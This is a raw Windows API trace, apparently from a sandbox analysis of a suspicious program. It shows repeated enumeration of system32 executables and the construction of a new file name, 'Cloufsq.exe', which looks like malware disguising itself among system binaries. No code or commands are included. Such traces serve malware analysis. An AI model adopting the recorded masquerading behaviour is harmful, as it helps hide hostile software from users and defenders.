	[0070.010] GetSystemDirectoryW (in: lpBuffer=0x72ee58, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0070.010] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0070.010] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 0x726b80
	[0070.010] StrRChrW (lpStart="gpscript.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.011] StrRChrW (lpStart="sdchange.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetLastError () returned 0x0
	[0070.011] GetSystemDirectoryW (in: lpBuffer=0x72ee58, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0070.011] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0070.011] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 0x726f40
	[0070.011] StrRChrW (lpStart="BackgroundTransferHost.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.012] StrRChrW (lpStart="cliconfg.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] lstrcatW (in: lpString1="Cloufsq", lpString2=".exe" | out: lpString1="Cloufsq.exe") returned="Cloufsq.exe"
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetLastError () returned 0x0
	[0070.012] GetSystemDirectoryW (in: lpBuffer=0x72ee58, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0070.012] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0070.012] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 0x726b80
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.013] StrRChrW (lpStart="control.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.014] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.015] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
